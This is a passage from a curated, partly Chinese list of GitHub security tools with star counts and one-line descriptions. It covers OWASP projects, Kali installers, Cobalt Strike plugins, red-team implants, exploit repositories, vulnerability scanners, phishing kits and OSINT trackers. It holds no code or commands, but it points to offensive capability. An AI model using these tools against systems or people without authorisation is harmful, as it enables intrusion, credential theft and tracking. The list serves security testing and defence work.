[owasp/owasp-masvs](https://github.com/owasp/owasp-masvs) OWASP 移动App安全标准 - [**503**星][10d] [owasp/wstg](https://github.com/OWASP/wstg) The OWASP Web Security Testing Guide includes a "best practice" penetration testing framework which users can implement in their own organizations and a "low level" penetration testing guide that describes techniques for testing most common web application and web service security issues. - [**503**星][10d] [owasp/wstg](https://github.com/owasp/wstg) The OWASP Web Security Testing Guide includes a "best practice" penetration testing framework which users can implement in their own organizations and a "low level" penetration testing guide that describes techniques for testing most common web application and web service security issues. - [**466**星][8m] [Java] [owasp/owasp-webscarab](https://github.com/owasp/owasp-webscarab) OWASP WebScarab - [**422**星][5m] [Py] [stanislav-web/opendoor](https://github.com/stanislav-web/opendoor) OWASP WEB Directory Scanner - [**370**星][4d] [Java] [zaproxy/zap-extensions](https://github.com/zaproxy/zap-extensions) OWASP ZAP Add-ons - [**348**星][2m] [Java] [esapi/esapi-java-legacy](https://github.com/esapi/esapi-java-legacy) ESAPI (The OWASP Enterprise Security API) is a free, open source, web application security control library that makes it easier for programmers to write lower-risk applications. - [**305**星][5m] [0xradi/owasp-web-checklist](https://github.com/0xradi/owasp-web-checklist) OWASP Web Application Security Testing Checklist - [**297**星][5m] [tanprathan/owasp-testing-checklist](https://github.com/tanprathan/owasp-testing-checklist) OWASP based Web Application Security Testing Checklist is an Excel based checklist which helps you to track the status of completed and pending test cases. - [**286**星][5m] [JS] [mike-goodwin/owasp-threat-dragon](https://github.com/mike-goodwin/owasp-threat-dragon) An open source, online threat modelling tool from OWASP - [**258**星][2m] [owasp/api-security](https://github.com/owasp/api-security) OWASP API Security Project - [**255**星][12m] [Java] [owasp/owasp-java-encoder](https://github.com/owasp/owasp-java-encoder) The OWASP Java Encoder is a Java 1.5+ simple-to-use drop-in high-performance encoder class with no dependencies and little baggage. This project will help Java web developers defend against Cross Site Scripting! - [**208**星][17d] [Java] [owasp/benchmark](https://github.com/owasp/benchmark) OWASP Benchmark is a test suite designed to verify the speed and accuracy of software vulnerability detection tools. A fully runnable web app written in Java, it supports analysis by Static (SAST), Dynamic (DAST), and Runtime (IAST) tools that support Java. The idea is that since it is fully runnable and all the vulnerabilities are actually expl… ### <a id="7667f6a0381b6cded2014a0d279b5722"></a>Kali - [**2538**星][8m] [offensive-security/kali-nethunter](https://github.com/offensive-security/kali-nethunter) The Kali NetHunter Project - [**2436**星][8m] [Py] [lionsec/katoolin](https://github.com/lionsec/katoolin) Automatically install all Kali linux tools - [**1699**星][3m] [PHP] [xtr4nge/fruitywifi](https://github.com/xtr4nge/fruitywifi) FruityWiFi is a wireless network auditing tool. The application can be installed in any Debian based system (Jessie) adding the extra packages. Tested in Debian, Kali Linux, Kali Linux ARM (Raspberry Pi), Raspbian (Raspberry Pi), Pwnpi (Raspberry Pi), Bugtraq, NetHunter. - [**879**星][11m] [Shell] [esc0rtd3w/wifi-hacker](https://github.com/esc0rtd3w/wifi-hacker) Shell Script For Attacking Wireless Connections Using Built-In Kali Tools. Supports All Securities (WEP, WPS, WPA, WPA2) - [**769**星][13d] [Py] [rajkumrdusad/tool-x](https://github.com/rajkumrdusad/tool-x) Tool-X is a kali linux hacking Tool installer. Tool-X developed for termux and other android terminals. using Tool-X you can install almost 370+ hacking tools in termux app and other linux based distributions. - [**675**星][8m] [offensive-security/kali-arm-build-scripts](https://github.com/offensive-security/kali-arm-build-scripts) Kali Linux ARM build scripts - [**556**星][2m] [Shell] [offensive-security/kali-linux-docker](https://github.com/offensive-security/kali-linux-docker) PLEASE USE GITLAB - [**425**星][4m] [jack-liang/kalitools](https://github.com/jack-liang/kalitools) Kali Linux工具清单 - [**336**星][8m] [offensive-security/kali-linux-recipes](https://github.com/offensive-security/kali-linux-recipes) Kali Linux Recipes - [**316**星][2m] [Shell] [brainfucksec/kalitorify](https://github.com/brainfucksec/kalitorify) 用于Kali的shell脚本,使用iptables创建通过Tor网络的透明代理。可以执行各种检查:检查Tor出口节点(即在Tor代理下时的公共IP),或者Tor已正确配置,可以检查服务和网络设置。 - [**273**星][27d] [C++] [steve-m/kalibrate-rtl](https://github.com/steve-m/kalibrate-rtl) fork of - [**203**星][5m] [jiansiting/kali-windows](https://github.com/jiansiting/kali-windows) Kali Windows ### <a id="0b8e79b79094082d0906153445d6ef9a"></a>CobaltStrike - [**1072**星][9d] [C#] [k8gege/ladon](https://github.com/k8gege/ladon) 大型内网渗透扫描器&Cobalt Strike,包含信息收集/端口扫描/服务识别/网络资产/密码爆破/漏洞检测/漏洞利用。漏洞检测含MS17010、Weblogic、ActiveMQ、Tomcat等,密码口令爆破含(Mysql、Oracle、MSSQL)、FTP、SSH(Linux)、VNC、Windows(IPC、WMI、SMB)等,可高度自定义插件支持.NET程序集、DLL(C#/Delphi/VC)、PowerShell等语言编写的插件,支持通过配置INI批量调用任意外部程序或命令,EXP生成器一键生成Web漏洞POC,可快速扩展扫描或利用能力。支持Cobalt Strike插件化直接内存加载Ladon扫描快速拓展内网横向移动 - [**770**星][5m] [aleenzz/cobalt_strike_wiki](https://github.com/aleenzz/cobalt_strike_wiki) Cobalt Strike系列 - [**474**星][1m] [Py] [k8gege/k8cscan](https://github.com/k8gege/k8cscan) 大型内网渗透自定义插件化扫描神器,包含信息收集、网络资产、漏洞扫描、密码爆破、漏洞利用,程序采用多线程批量扫描大型内网多个IP段C段主机,目前插件包含: C段旁注扫描、子域名扫描、Ftp密码爆破、Mysql密码爆破、Oracle密码爆破、MSSQL密码爆破、Windows/Linux系统密码爆破、存活主机扫描、端口扫描、Web信息探测、操作系统版本探测、Cisco思科设备扫描等,支持调用任意外部程序或脚本,支持Cobalt Strike联动 - [**397**星][1y] [Shell] [killswitch-gui/cobaltstrike-toolkit](https://github.com/killswitch-gui/cobaltstrike-toolkit) Some useful scripts for CobaltStrike - [**287**星][7m] [JS] [joshuaferrara/node-csgo](https://github.com/joshuaferrara/node-csgo) A node-steam plugin for Counter-Strike: Global Offensive. - [**217**星][12d] [JS] [saul/demofile](https://github.com/saul/demofile) Node.js library for parsing Counter-Strike: Global Offensive demo files - [**215**星][9m] [PS] [outflanknl/excel4-dcom](https://github.com/outflanknl/excel4-dcom) PowerShell and Cobalt Strike scripts for lateral movement using Excel 4.0 / XLM macros via DCOM (direct shellcode injection in Excel.exe) - [**207**星][1y] [C#] [spiderlabs/sharpcompile](https://github.com/spiderlabs/sharpcompile) SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing… ### <a id="fb821e664950df22549557cb8cc54afe"></a>CMS ### <a id="53f3011d262d2554156afe18d7ad6a43"></a>日志 ### <a id="b0233cd346f5ee456ee04bf653b12ae2"></a>劫持&&各种劫持 #### <a id="b087f1741bcf7c449d2910d052a7f312"></a>未分类-Hijack - [**1417**星][1m] [Java] [chrisk44/hijacker](https://github.com/chrisk44/hijacker) Aircrack, Airodump, Aireplay, MDK3 and Reaver GUI Application for Android - [**554**星][6m] [Py] [owasp/qrljacking](https://github.com/owasp/qrljacking) 一个简单的能够进行会话劫持的社会工程攻击向量,影响所有使用“使用 QR 码登录”作为安全登录方式的应用程序。( Quick Response CodeLogin Jacking) #### <a id="ecdeb90ce9bd347ca7f9d366d157689d"></a>点击劫持 ### <a id="8afafc25f4fb0805556003864cce90e2"></a>RedTeam - [**617**星][19d] [Py] [facebookincubator/weasel](https://github.com/facebookincubator/weasel) DNS covert channel implant for Red Teams. - [**542**星][8m] [Py] [wyatu/perun](https://github.com/wyatu/perun) 主要适用于乙方安服、渗透测试人员和甲方RedTeam红队人员的网络资产漏洞扫描器/扫描框架 - [**476**星][13d] [PS] [mantvydasb/redteam-tactics-and-techniques](https://github.com/mantvydasb/RedTeam-Tactics-and-Techniques) Red Teaming Tactics and Techniques - [**357**星][2m] [C] [nccgroup/phantap](https://github.com/nccgroup/phantap) Phantom Tap (PhanTap) - an ‘invisible’ network tap aimed at red teams - [**221**星][2m] [Py] [khast3x/redcloud](https://github.com/khast3x/redcloud) Comfy & powerful Red Team Infrastructure deployement using Docker - [**220**星][9m] [Py] [coalfire-research/deathmetal](https://github.com/coalfire-research/deathmetal) Red team & penetration testing tools to exploit the capabilities of Intel AMT - [**217**星][1y] [foobarto/redteam-notebook](https://github.com/foobarto/redteam-notebook) Collection of commands, tips and tricks and references I found useful during preparation for OSCP exam. ### <a id="4c42a9cc007de389f975cb0ce146c0ed"></a>BlueTeam - [**883**星][4m] [CSS] [outflanknl/redelk](https://github.com/outflanknl/redelk) 跟踪和警告Blue Team活动以及长期运营中的更高可用性 - [**639**星][5m] [smgorelik/windows-rce-exploits](https://github.com/smgorelik/windows-rce-exploits) The exploit samples database is a repository for **RCE** (remote code execution) exploits and Proof-of-Concepts for **WINDOWS**, the samples are uploaded for education purposes for red and blue teams. - [**409**星][1y] [C] [ww9210/linux_kernel_exploits](https://github.com/ww9210/linux_kernel_exploits) Repo for FUZE project. I will also publish some Linux kernel LPE exploits for various real world kernel vulnerabilities here. the samples are uploaded for education purposes for red and blue teams. - [**261**星][11d] [Ruby] [evait-security/envizon](https://github.com/evait-security/envizon) 网络可视化工具, 在渗透测试中快速识别最可能的目标 *** ## <a id="f21aa1088a437dbb001a137f6f885530"></a>文章 ### <a id="7229723a22769af40b96ab31fb09dcc7"></a>新添加的 ### <a id="6280e13d236b0f18c75894d304309416"></a>Metasploit ### <a id="082a9e72817adcf2f824767e3e2ce597"></a>BurpSuite ### <a id="6710d6fe61cbbc36b2ba75de156eda8a"></a>CobaltStrike # <a id="8f92ead9997a4b68d06a9acf9b01ef63"></a>扫描器&&安全扫描&&App扫描&&漏洞扫描 *** ## <a id="132036452bfacf61471e3ea0b7bf7a55"></a>工具 ### <a id="de63a029bda6a7e429af272f291bb769"></a>未分类-Scanner - [**11486**星][3m] [C] [robertdavidgraham/masscan](https://github.com/robertdavidgraham/masscan) masscan:世界上最快的互联网端口扫描器,号称可6分钟内扫描整个互联网 - [**7449**星][3d] [Py] [s0md3v/xsstrike](https://github.com/s0md3v/XSStrike) Most advanced XSS scanner. - [**5351**星][15d] [Go] [zricethezav/gitleaks](https://github.com/zricethezav/gitleaks) Audit git repos for secrets - [**4563**星][8d] [Ruby] [wpscanteam/wpscan](https://github.com/wpscanteam/wpscan) WPScan is a free, for non-commercial use, black box WordPress Vulnerability Scanner written for security professionals and blog maintainers to test the security of their WordPress websites. - [**4215**星][24d] [we5ter/scanners-box](https://github.com/we5ter/scanners-box) 安全行业从业者自研开源扫描器合辑 - [**3455**星][26d] [Perl] [sullo/nikto](https://github.com/sullo/nikto) Nikto web server scanner - [**3279**星][20d] [Go] [mozilla/sops](https://github.com/mozilla/sops) Simple and flexible tool for managing secrets - [**3252**星][26d] [Py] [maurosoria/dirsearch](https://github.com/maurosoria/dirsearch) Web path scanner - [**3092**星][3m] [C] [zmap/zmap](https://github.com/zmap/zmap) ZMap is a fast single packet network scanner designed for Internet-wide network surveys. - [**2960**星][2m] [Py] [andresriancho/w3af](https://github.com/andresriancho/w3af) Web App安全扫描器, 辅助开发者和渗透测试人员识别和利用Web App中的漏洞 - [**2669**星][20d] [Py] [cloudflare/flan](https://github.com/cloudflare/flan) A pretty sweet vulnerability scanner - [**2287**星][4m] [JS] [retirejs/retire.js](https://github.com/retirejs/retire.js) scanner detecting the use of JavaScript libraries with known vulnerabilities - [**2113**星][12d] [Ruby] [urbanadventurer/whatweb](https://github.com/urbanadventurer/whatweb) Next generation web scanner - [**2050**星][23d] [Py] [nabla-c0d3/sslyze](https://github.com/nabla-c0d3/sslyze) SSL/TLS服务器扫描 - [**1682**星][2m] [NSIS] [angryip/ipscan](https://github.com/angryip/ipscan) Angry IP Scanner - fast and friendly network scanner - [**1560**星][8m] [Py] [m4ll0k/wascan](https://github.com/m4ll0k/WAScan) WAScan - Web Application Scanner - [**1511**星][9d] [Py] [hannob/snallygaster](https://github.com/hannob/snallygaster) Python脚本, 扫描HTTP服务器"秘密文件" - [**1139**星][24d] [Py] [gerbenjavado/linkfinder](https://github.com/gerbenjavado/linkfinder) A python script that finds endpoints in JavaScript files - [**1102**星][3m] [PHP] [tuhinshubhra/red_hawk](https://github.com/tuhinshubhra/red_hawk) 信息收集、漏洞扫描、爬虫多合一 - 重复区段: [侦察->工具->未分类-OSINT](#05ab1b75266fddafc7195f5b395e4d99) | - [**1076**星][8m] [Py] [lucifer1993/struts-scan](https://github.com/lucifer1993/struts-scan) struts2漏洞全版本检测和利用工具 - [**1062**星][4m] [Py] [h4ckforjob/dirmap](https://github.com/h4ckforjob/dirmap) 一个高级web目录、文件扫描工具,功能将会强于DirBuster、Dirsearch、cansina、御剑。 - [**935**星][6m] [PHP] [tidesec/wdscanner](https://github.com/tidesec/wdscanner) 分布式web漏洞扫描、客户管理、漏洞定期扫描、子域名枚举、端口扫描、网站爬虫、暗链检测、坏链检测、网站指纹搜集、专项漏洞检测、代理搜集及部署等功能。 - [**933**星][3m] [Py] [tuhinshubhra/cmseek](https://github.com/tuhinshubhra/cmseek) CMS Detection and Exploitation suite - Scan WordPress, Joomla, Drupal and over 170 other CMSs - [**896**星][20d] [Py] [ajinabraham/nodejsscan](https://github.com/ajinabraham/nodejsscan) NodeJsScan is a static security code scanner for Node.js applications. - [**855**星][12d] [JS] [cloudsploit/scans](https://github.com/cloudsploit/scans) Cloud security configuration checks - [**767**星][2m] [Py] [vesche/scanless](https://github.com/vesche/scanless) 端口扫描器 - [**758**星][2m] [Py] [nekmo/dirhunt](https://github.com/nekmo/dirhunt) Web爬虫, 针对搜索和分析路径做了优化 - 重复区段: [爬虫->工具->未分类](#442f9390fd56008def077a21ab65d4aa) | - [**734**星][7m] [Py] [ztgrace/changeme](https://github.com/ztgrace/changeme) 默认证书扫描器 - [**725**星][14d] [CSS] [w-digital-scanner/w12scan](https://github.com/w-digital-scanner/w12scan) a network asset discovery engine that can automatically aggregate related assets for analysis and use - [**704**星][23d] [Py] [grayddq/gscan](https://github.com/grayddq/gscan) 本程序旨在为安全应急响应人员对Linux主机排查时提供便利,实现主机侧Checklist的自动全面化检测,根据检测结果自动数据聚合,进行黑客攻击路径溯源。 - [**703**星][5m] [CSS] [ajinabraham/cmsscan](https://github.com/ajinabraham/cmsscan) Scan Wordpress, Drupal, Joomla, vBulletin websites for Security issues - [**702**星][1m] [C] [scanmem/scanmem](https://github.com/scanmem/scanmem) memory scanner for Linux - [**686**星][14d] [Py] [kevthehermit/pastehunter](https://github.com/kevthehermit/pastehunter) Scanning pastebin with yara rules - [**671**星][8m] [Py] [m4ll0k/wpseku](https://github.com/m4ll0k/wpseku) WPSeku - Wordpress Security Scanner - [**671**星][2m] [Ruby] [mozilla/ssh_scan](https://github.com/mozilla/ssh_scan) A prototype SSH configuration and policy scanner (Blog: - [**669**星][6m] [Py] [droope/droopescan](https://github.com/droope/droopescan) A plugin-based scanner that aids security researchers in identifying issues with several CMSs, mainly Drupal & Silverstripe. - [**665**星][6m] [Py] [rabbitmask/weblogicscan](https://github.com/rabbitmask/weblogicscan) Weblogic一键漏洞检测工具,V1.3 - [**641**星][1y] [Py] [lmco/laikaboss](https://github.com/lmco/laikaboss) Laika BOSS: Object Scanning System - [**618**星][5m] [Py] [faizann24/xsspy](https://github.com/faizann24/xsspy) Web Application XSS Scanner - [**610**星][1y] [Ruby] [thesp0nge/dawnscanner](https://github.com/thesp0nge/dawnscanner) Dawn is a static analysis security scanner for ruby written web applications. It supports Sinatra, Padrino and Ruby on Rails frameworks. - [**578**星][8d] [Py] [codingo/vhostscan](https://github.com/codingo/vhostscan) A virtual host scanner that performs reverse lookups, can be used with pivot tools, detect catch-all scenarios, work around wildcards, aliases and dynamic default pages. - [**576**星][3m] [Perl] [alisamtechnology/atscan](https://github.com/alisamtechnology/atscan) Advanced dork Search & Mass Exploit Scanner - [**574**星][2m] [HTML] [gwillem/magento-malware-scanner](https://github.com/gwillem/magento-malware-scanner) 用于检测 Magento 恶意软件的规则/样本集合 - [**563**星][8m] [Go] [marco-lancini/goscan](https://github.com/marco-lancini/goscan) Interactive Network Scanner - [**539**星][5m] [Py] [cisagov/pshtt](https://github.com/cisagov/pshtt) Scan domains and return data based on HTTPS best practices - [**485**星][2m] [Py] [fcavallarin/htcap](https://github.com/fcavallarin/htcap) htcap is a web application scanner able to crawl single page application (SPA) recursively by intercepting ajax calls and DOM changes. - [**476**星][1y] [C] [nanshihui/scan-t](https://github.com/nanshihui/scan-t) a new crawler based on python with more function including Network fingerprint search - [**442**星][11d] [Py] [w-digital-scanner/w13scan](https://github.com/w-digital-scanner/w13scan) Passive Security Scanner (被动式安全扫描器) - [**401**星][11m] [JS] [eviltik/evilscan](https://github.com/eviltik/evilscan) 大规模 IP/端口扫描器,Node.js 编写 - [**400**星][1y] [Py] [grayddq/publicmonitors](https://github.com/grayddq/publicmonitors) 对公网IP列表进行端口服务扫描,发现周期内的端口服务变化情况和弱口令安全风险 - [**398**星][t] [C] [hasherezade/hollows_hunter](https://github.com/hasherezade/hollows_hunter) Scans all running processes. Recognizes and dumps a variety of potentially malicious implants (replaced/implanted PEs, shellcodes, hooks, in-memory patches). - [**393**星][11m] [Py] [mitre/multiscanner](https://github.com/mitre/multiscanner) Modular file scanning/analysis framework - [**384**星][1m] [Py] [stamparm/dsss](https://github.com/stamparm/dsss) Damn Small SQLi Scanner - [**376**星][1m] [Py] [skavngr/rapidscan](https://github.com/skavngr/rapidscan) | The Multi-Tool Web Vulnerability Scanner. - [**368**星][4d] [Swift] [evermeer/passportscanner](https://github.com/evermeer/passportscanner) Scan the MRZ code of a passport and extract the firstname, lastname, passport number, nationality, date of birth, expiration date and personal numer. - [**356**星][5m] [Py] [swisskyrepo/wordpresscan](https://github.com/swisskyrepo/wordpresscan) WPScan rewritten in Python + some WPSeku ideas - [**346**星][4m] [Java] [portswigger/backslash-powered-scanner](https://github.com/portswigger/backslash-powered-scanner) Finds unknown classes of injection vulnerabilities - [**343**星][28d] [Py] [fgeek/pyfiscan](https://github.com/fgeek/pyfiscan) Web App 漏洞及版本扫描 - [**333**星][1y] [Py] [flipkart-incubator/rta](https://github.com/flipkart-incubator/rta) Red team Arsenal - An intelligent scanner to detect security vulnerabilities in company's layer 7 assets. - [**330**星][2d] [C] [royhills/arp-scan](https://github.com/royhills/arp-scan) The ARP Scanner - [**320**星][12d] [HTML] [coinbase/salus](https://github.com/coinbase/salus) Security scanner coordinator - [**314**星][1m] [PS] [canix1/adaclscanner](https://github.com/canix1/adaclscanner) Repo for ADACLScan.ps1 - Your number one script for ACL's in Active Directory - [**305**星][3m] [Ruby] [m0nad/hellraiser](https://github.com/m0nad/hellraiser) Vulnerability Scanner - [**303**星][10m] [PHP] [steverobbins/magescan](https://github.com/steverobbins/magescan) Scan a Magento site for information - [**301**星][6d] [Shell] [mitchellkrogza/apache-ultimate-bad-bot-blocker](https://github.com/mitchellkrogza/apache-ultimate-bad-bot-blocker) Apache Block Bad Bots, (Referer) Spam Referrer Blocker, Vulnerability Scanners, Malware, Adware, Ransomware, Malicious Sites, Wordpress Theme Detectors and Fail2Ban Jail for Repeat Offenders - [**296**星][9m] [Py] [boy-hack/w8fuckcdn](https://github.com/boy-hack/w8fuckcdn) 通过扫描全网绕过CDN获取网站IP地址 - [**296**星][1y] [Shell] [cryptolok/ghostinthenet](https://github.com/cryptolok/ghostinthenet) Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan - [**293**星][5m] [enkomio/taipan](https://github.com/enkomio/Taipan) Web application vulnerability scanner - [**288**星][1m] [Go] [zmap/zgrab2](https://github.com/zmap/zgrab2) Go Application Layer Scanner - [**287**星][4d] [Py] [target/strelka](https://github.com/target/strelka) Real-time, container-based file scanning at enterprise scale - [**287**星][2m] [Py] [xdavidhu/portspider](https://github.com/xdavidhu/portspider) A lightning fast multithreaded network scanner framework with modules. - [**285**星][1y] [Py] [code-scan/dzscan](https://github.com/code-scan/dzscan) Dzscan - [**282**星][4m] [Py] [shenril/sitadel](https://github.com/shenril/sitadel) Web Application Security Scanner - [**271**星][14d] [Py] [abhisharma404/vault](https://github.com/abhisharma404/vault) swiss army knife for hackers - [**263**星][3m] [Py] [m4ll0k/konan](https://github.com/m4ll0k/Konan) Konan - Advanced Web Application Dir Scanner - [**252**星][24d] [Swift] [netyouli/whc_scan](https://github.com/netyouli/whc_scan) 高效强大扫描分析iOS和Android项目里没有使用的类Mac开源工具,清理项目垃圾类,让项目结构干净清爽,升级维护得心应手. Efficient and powerful scanning analysis iOS and Android project no classes used in Mac open source tools, cleaning rubbish class project, make project structure clean and relaxed, upgrade maintenance - [**251**星][10m] [jeffzh3ng/insectsawake](https://github.com/jeffzh3ng/insectsawake) Network Vulnerability Scanner - [**246**星][2m] [Py] [gildasio/h2t](https://github.com/gildasio/h2t) h2t (HTTP Hardening Tool) scans a website and suggests security headers to apply - [**239**星][2m] [PHP] [psecio/versionscan](https://github.com/psecio/versionscan) A PHP version scanner for reporting possible vulnerabilities - [**237**星][8m] [Go] [gocaio/goca](https://github.com/gocaio/goca) Goca Scanner - [**225**星][6m] [Py] [rub-nds/corstest](https://github.com/rub-nds/corstest) A simple CORS misconfiguration scanner - [**224**星][6m] [JS] [pavanw3b/sh00t](https://github.com/pavanw3b/sh00t) Security Testing is not as simple as right click > Scan. It's messy, a tough game. What if you had missed to test just that one thing and had to regret later? Sh00t is a highly customizable, intelligent platform that understands the life of bug hunters and emphasizes on manual security testing. - [**220**星][1y] [Py] [dionach/cmsmap](https://github.com/dionach/cmsmap) CMSmap is a python open source CMS scanner that automates the process of detecting security flaws of the most popular CMSs. - [**216**星][4m] [Py] [iojw/socialscan](https://github.com/iojw/socialscan) Check email address and username availability on online platforms with 100% accuracy - [**213**星][10m] [Py] [nullarray/dorknet](https://github.com/nullarray/dorknet) Selenium powered Python script to automate searching for vulnerable web apps. - [**208**星][4m] [Py] [lengjibo/dedecmscan](https://github.com/lengjibo/dedecmscan) 织梦全版本漏洞扫描 - [**202**星][1y] [PS] [sud0woodo/dcomrade](https://github.com/sud0woodo/dcomrade) Powershell script for enumerating vulnerable DCOM Applications ### <a id="58d8b993ffc34f7ded7f4a0077129eb2"></a>隐私&&Secret&&Privacy扫描 - [**6861**星][30d] [Shell] [awslabs/git-secrets](https://github.com/awslabs/git-secrets) Prevents you from committing secrets and credentials into git repositories - [**4468**星][1m] [Py] [jofpin/trape](https://github.com/jofpin/trape) 学习在互联网上跟踪别人,获取其详细信息,并避免被别人跟踪 - [**3091**星][5d] [Py] [tribler/tribler](https://github.com/tribler/tribler) Privacy enhanced BitTorrent client with P2P content discovery - [**2204**星][1m] [sobolevn/awesome-cryptography](https://github.com/sobolevn/awesome-cryptography) A curated list of cryptography resources and links. - [**1141**星][5m] [Vue] [0xbug/hawkeye](https://github.com/0xbug/hawkeye) GitHub 泄露监控系统(GitHub Sensitive Information Leakage Monitor Spider) - [**955**星][19d] [Py] [mozilla/openwpm](https://github.com/mozilla/OpenWPM) A web privacy measurement framework - [**932**星][5d] [C#] [elevenpaths/foca](https://github.com/elevenpaths/foca) Tool to find metadata and hidden information in the documents. - [**892**星][2m] [Py] [al0ne/vxscan](https://github.com/al0ne/vxscan) python3写的综合扫描工具,主要用来存活验证,敏感文件探测(目录扫描/js泄露接口/html注释泄露),WAF/CDN识别,端口扫描,指纹/服务识别,操作系统识别,POC扫描,SQL注入,绕过CDN,查询旁站等功能,主要用来甲方自测或乙方授权测试,请勿用来搞破坏。 - [**395**星][7m] [Py] [repoog/gitprey](https://github.com/repoog/gitprey) Searching sensitive files and contents in GitHub associated to company name or other key words - [**355**星][2m] [Py] [hell0w0rld0/github-hunter](https://github.com/hell0w0rld0/github-hunter) This tool is for sensitive information searching on Github - The Fast Version here: - [**324**星][4d] [HTML] [tanjiti/sec_profile](https://github.com/tanjiti/sec_profile) 爬取secwiki和xuanwu.github.io/sec.today,分析安全信息站点、安全趋势、提取安全工作者账号(twitter,weixin,github等) - 重复区段: [侦察->工具->社交网络->Github](#8d1ae776898748b8249132e822f6c919) | ### <a id="1927ed0a77ff4f176b0b7f7abc551e4a"></a>隐私存储 #### <a id="1af1c4f9dba1db2a4137be9c441778b8"></a>未分类 - [**5082**星][3m] [Shell] [stackexchange/blackbox](https://github.com/stackexchange/blackbox) 文件使用PGP加密后隐藏在Git/Mercurial/Subversion #### <a id="362dfd9c1f530dd20f922fd4e0faf0e3"></a>隐写 - [**583**星][2m] [Go] [dimitarpetrov/stegify](https://github.com/dimitarpetrov/stegify) Go tool for LSB steganography, capable of hiding any file within an image. - [**358**星][7m] [Go] [lukechampine/jsteg](https://github.com/lukechampine/jsteg) JPEG steganography - [**354**星][6m] [Java] [syvaidya/openstego](https://github.com/syvaidya/openstego) OpenStego is a steganography application that provides two functionalities: a) Data Hiding: It can hide any data within a cover file (e.g. images). b) Watermarking: Watermarking files (e.g. images) with an invisible signature. It can be used to detect unauthorized file copying. - [**280**星][1y] [C] [abeluck/stegdetect](https://github.com/abeluck/stegdetect) UNMAINTAINED. USE AT OWN RISK. Stegdetect is an automated tool for detecting steganographic content in images. - [**258**星][] [Py] [cedricbonhomme/stegano](https://github.com/cedricbonhomme/stegano) Stegano is a pure Python steganography module. *** ## <a id="1d8298e4ee4ad3c3028a1e157f85f27b"></a>文章 ### <a id="7669ebab00d00c744abc35195fbaa833"></a>新添加的 # <a id="a76463feb91d09b3d024fae798b92be6"></a>侦察&&信息收集&&子域名发现与枚举&&OSINT *** ## <a id="170048b7d8668c50681c0ab1e92c679a"></a>工具 ### <a id="05ab1b75266fddafc7195f5b395e4d99"></a>未分类-OSINT - [**7307**星][12d] [Java] [lionsoul2014/ip2region](https://github.com/lionsoul2014/ip2region) Ip2region is a offline IP location library with accuracy rate of 99.9% and 0.0x millseconds searching performance. DB file is less then 5Mb with all ip address stored. binding for Java,PHP,C,Python,Nodejs,Golang,C#,lua. Binary,B-tree,Memory searching algorithm - [**6964**星][22d] [greatfire/wiki](https://github.com/greatfire/wiki) 自由浏览 - [**6140**星][10m] [Py] [schollz/howmanypeoplearearound](https://github.com/schollz/howmanypeoplearearound) 检测 Wifi 信号统计你周围的人数 - 重复区段: [无线->未分类-WiFi](#d4efda1853b2cb0909727188116a2a8c) | - [**2224**星][1m] [C] [texane/stlink](https://github.com/texane/stlink) stm32 discovery line linux programmer - [**2134**星][t] [Py] [fortynorthsecurity/eyewitness](https://github.com/FortyNorthSecurity/EyeWitness) 给网站做快照,提供服务器Header信息,识别默认凭证等 - [**1792**星][t] [Shell] [leebaird/discover](https://github.com/leebaird/discover) 自定义的bash脚本, 用于自动化多个渗透测试任务, 包括: 侦查、扫描、解析、在Metasploit中创建恶意Payload和Listener - 重复区段: [渗透->工具->自动化](#fc8737aef0f59c3952d11749fe582dac) |[渗透->工具->Metasploit->未分类-metasploit](#01be61d5bb9f6f7199208ff0fba86b5d) |[Payload->工具->Payload生成](#ad92f6b801a18934f1971e2512f5ae4f) | - [**1666**星][] [Py] [cea-sec/ivre](https://github.com/cea-sec/ivre) Network recon framework. - [**1642**星][25d] [Go] [awnumar/memguard](https://github.com/awnumar/memguard) 处理内存中敏感的值,纯Go语言编写。 - [**1609**星][5m] [Py] [mozilla/cipherscan](https://github.com/mozilla/cipherscan) 查找指定目标支持的SSL ciphersuites - [**1484**星][13d] [Py] [enablesecurity/wafw00f](https://github.com/enablesecurity/wafw00f) 识别保护网站的WAF产品 - [**1401**星][13d] [JS] [lockfale/osint-framework](https://github.com/lockfale/osint-framework) OSINT Framework - [**1363**星][2m] [CSS] [undeadsec/socialfish](https://github.com/undeadsec/socialfish) 网络钓鱼培训与信息收集 - 重复区段: [社工(SET)->工具->未分类-SET](#ce734598055ad3885d45d0b35d2bf0d7) | - [**1354**星][8d] [Py] [s0md3v/arjun](https://github.com/s0md3v/Arjun) HTTP parameter discovery suite. - [**1289**星][3m] [Py] [codingo/reconnoitre](https://github.com/codingo/reconnoitre) A security tool for multithreaded information gathering and service enumeration whilst building directory structures to store results, along with writing out recommendations for further testing. - [**1279**星][1y] [PS] [dafthack/mailsniper](https://github.com/dafthack/mailsniper) 在Microsoft Exchange环境中搜索邮件中包含的指定内容:密码、insider intel、网络架构信息等 - [**1224**星][1m] [Py] [codingo/nosqlmap](https://github.com/codingo/NoSQLMap) Automated NoSQL database enumeration and web application exploitation tool. - [**1199**星][11m] [C] [blechschmidt/massdns](https://github.com/blechschmidt/massdns) A high-performance DNS stub resolver for bulk lookups and reconnaissance (subdomain enumeration) - [**1108**星][t] [Py] [sundowndev/phoneinfoga](https://github.com/sundowndev/phoneinfoga) Advanced information gathering & OSINT tool for phone numbers - [**1102**星][3m] [PHP] [tuhinshubhra/red_hawk](https://github.com/tuhinshubhra/red_hawk) 信息收集、漏洞扫描、爬虫多合一 - 重复区段: [扫描器->工具->未分类-Scanner](#de63a029bda6a7e429af272f291bb769) | - [**1059**星][16d] [Rust] [fgribreau/mailchecker](https://github.com/fgribreau/mailchecker) 邮件检测库,跨语言。覆盖33078虚假邮件提供者 - [**976**星][5m] [C] [rbsec/sslscan](https://github.com/rbsec/sslscan) 测试启用SSL/TLS的服务,发现其支持的cipher suites - [**931**星][16d] [OCaml] [airbus-seclab/bincat](https://github.com/airbus-seclab/bincat) 二进制代码静态分析工具。值分析(寄存器、内存)、污点分析、类型重建和传播(propagation)、前向/后向分析 - [**906**星][5m] [derpopo/uabe](https://github.com/derpopo/uabe) Unity Assets Bundle Extractor - [**866**星][8m] [Py] [s0md3v/recondog](https://github.com/s0md3v/ReconDog) Reconnaissance Swiss Army Knife - [**778**星][5m] [Shell] [nahamsec/lazyrecon](https://github.com/nahamsec/lazyrecon) 